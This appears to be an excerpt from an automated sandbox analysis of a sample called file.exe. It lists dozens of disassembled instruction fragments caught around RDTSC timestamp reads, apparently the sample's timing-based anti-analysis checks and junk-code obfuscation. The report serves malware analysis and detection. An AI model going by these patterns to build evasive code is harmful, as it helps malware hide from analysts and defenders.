                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546263 second address: 546267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5454E4 second address: 545509 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C6F736h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007FB438C6F726h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 545509 second address: 545529 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0C09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54835B second address: 54837C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 ja 00007FB438C6F726h 0x0000000c jc 00007FB438C6F726h 0x00000012 popad 0x00000013 pop esi 0x00000014 push edi 0x00000015 jne 00007FB438C6F728h 0x0000001b push eax 0x0000001c push edx 0x0000001d push edi 0x0000001e pop edi 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549B24 second address: 549B28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549B28 second address: 549B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jbe 00007FB438C6F734h 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007FB438C6F726h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549B3D second address: 549BFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007FB438CB0BF8h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 mov ebx, dword ptr [ebp+1247BA58h] 0x00000027 sub di, 0490h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebp 0x00000031 call 00007FB438CB0BF8h 0x00000036 pop ebp 0x00000037 mov dword ptr [esp+04h], ebp 0x0000003b add dword ptr [esp+04h], 00000017h 0x00000043 inc ebp 0x00000044 push ebp 0x00000045 ret 0x00000046 pop ebp 0x00000047 ret 0x00000048 jg 00007FB438CB0C08h 0x0000004e jne 00007FB438CB0BFEh 0x00000054 push 00000000h 0x00000056 push 00000000h 0x00000058 push ecx 0x00000059 call 00007FB438CB0BF8h 0x0000005e pop ecx 0x0000005f mov dword ptr [esp+04h], ecx 0x00000063 add dword ptr [esp+04h], 0000001Bh 0x0000006b inc ecx 0x0000006c push ecx 0x0000006d ret 0x0000006e pop ecx 0x0000006f ret 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 jns 00007FB438CB0C0Ah 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549BFB second address: 549C17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB438C6F738h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 548C3D second address: 548C43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 548C43 second address: 548C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54AD68 second address: 54AD6E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54CADF second address: 54CAF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnp 00007FB438C6F734h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54CAF1 second address: 54CAF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54CAF5 second address: 54CB32 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 sub edi, dword ptr [ebp+122D2C19h] 0x0000000d pushad 0x0000000e mov ch, 14h 0x00000010 mov edi, dword ptr [ebp+122D2BD5h] 0x00000016 popad 0x00000017 push 00000000h 0x00000019 mov di, ax 0x0000001c push 00000000h 0x0000001e mov di, 1BD5h 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 jmp 00007FB438C6F736h 0x0000002b pop eax 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54CC91 second address: 54CC99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54DC27 second address: 54DC2C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54EC25 second address: 54ECA9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB438CB0C0Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov bx, B3BCh 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov ebx, edi 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f mov dword ptr [ebp+124550FEh], ecx 0x00000025 mov eax, dword ptr [ebp+122D02EDh] 0x0000002b mov edi, 79B99A00h 0x00000030 push FFFFFFFFh 0x00000032 jmp 00007FB438CB0BFAh 0x00000037 nop 0x00000038 jg 00007FB438CB0C08h 0x0000003e push eax 0x0000003f jo 00007FB438CB0C14h 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FB438CB0C02h 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54ECA9 second address: 54ECAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 550AF6 second address: 550AFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F238A second address: 4F23BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C6F734h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jns 00007FB438C6F726h 0x00000011 push esi 0x00000012 pop esi 0x00000013 jmp 00007FB438C6F730h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 555077 second address: 555089 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB438CB0BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007FB438CB0BFEh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 555089 second address: 55508F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5554AE second address: 5554EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007FB438CB0BF6h 0x0000000b jmp 00007FB438CB0C09h 0x00000010 jmp 00007FB438CB0C04h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5554EE second address: 5554FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007FB438C6F726h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8CEE second address: 4F8D28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0BFBh 0x00000007 push ebx 0x00000008 jnp 00007FB438CB0BF6h 0x0000000e jng 00007FB438CB0BF6h 0x00000014 pop ebx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 pushad 0x00000019 jmp 00007FB438CB0BFBh 0x0000001e jnl 00007FB438CB0BF6h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 push ecx 0x00000028 pushad 0x00000029 popad 0x0000002a pop ecx 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8D28 second address: 4F8D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8D2E second address: 4F8D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8D34 second address: 4F8D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8D41 second address: 4F8D45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E698 second address: 55E6AA instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB438C6F726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FB438C6F726h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E6AA second address: 55E6AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E6AE second address: 55E6C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FB438C6F728h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E6C0 second address: 55E707 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0BFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FB438CB0C08h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FB438CB0C09h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E707 second address: 55E71E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB438C6F733h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563D30 second address: 563D35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562ABB second address: 562AC0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5631CF second address: 5631DC instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB438CB0BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563348 second address: 563361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB438C6F733h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563B4F second address: 563B53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563B53 second address: 563B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563B5C second address: 563B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC282 second address: 4FC288 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A534 second address: 56A54A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB438CB0C00h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A54A second address: 56A553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A553 second address: 56A557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5326E0 second address: 5326F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB438C6F72Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532848 second address: 532861 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0C05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532861 second address: 532866 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5328EE second address: 53292A instructions: 0x00000000 rdtsc 0x00000002 je 00007FB438CB0BF8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], esi 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FB438CB0BF8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 nop 0x0000002a push eax 0x0000002b push edx 0x0000002c jg 00007FB438CB0BFCh 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5329FD second address: 532A02 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532A02 second address: 532A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007FB438CB0C04h 0x0000000f jno 00007FB438CB0BFCh 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jc 00007FB438CB0C00h 0x00000020 pushad 0x00000021 push eax 0x00000022 pop eax 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532C7B second address: 532C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53309A second address: 5330A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A64B second address: 51A654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A654 second address: 51A65E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB438CB0BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E66E8 second address: 4E66F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E66F0 second address: 4E66F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A835 second address: 56A83B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56AB20 second address: 56AB7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0C07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnl 00007FB438CB0BF6h 0x00000010 jmp 00007FB438CB0C09h 0x00000015 jmp 00007FB438CB0C00h 0x0000001a jmp 00007FB438CB0C01h 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56AB7D second address: 56AB83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56AB83 second address: 56AB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB438CB0BF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56AB8D second address: 56AB9D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB438C6F726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B162 second address: 56B171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FB438CB0BF6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B171 second address: 56B175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B175 second address: 56B18C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0BFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FB438CB0BFCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 572BA2 second address: 572BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 572BAD second address: 572BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 572BB1 second address: 572BB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 572EAD second address: 572EB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 572EB4 second address: 572F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB438C6F739h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB438C6F739h 0x00000013 js 00007FB438C6F732h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5730A6 second address: 5730AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 573239 second address: 57324D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C6F730h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57324D second address: 573259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007FB438CB0BF6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 573259 second address: 573285 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007FB438C6F72Ah 0x00000012 jp 00007FB438C6F736h 0x00000018 jmp 00007FB438C6F730h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 573390 second address: 5733C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FB438CB0C0Bh 0x0000000b jmp 00007FB438CB0BFEh 0x00000010 pushad 0x00000011 ja 00007FB438CB0BF6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57352E second address: 57353E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57353E second address: 573555 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB438CB0C00h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5737F2 second address: 57380C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jl 00007FB438C6F726h 0x0000000c jmp 00007FB438C6F72Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57380C second address: 573812 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 573812 second address: 573818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 573D97 second address: 573D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 573D9B second address: 573DA5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB438C6F726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5799AA second address: 5799B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5799B0 second address: 5799B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A222 second address: 57A228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A228 second address: 57A22E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A22E second address: 57A24C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FB438CB0BF6h 0x00000009 jmp 00007FB438CB0C03h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A24C second address: 57A258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A258 second address: 57A25E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A25E second address: 57A262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A262 second address: 57A266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A414 second address: 57A41F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E1E0 second address: 57E1E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
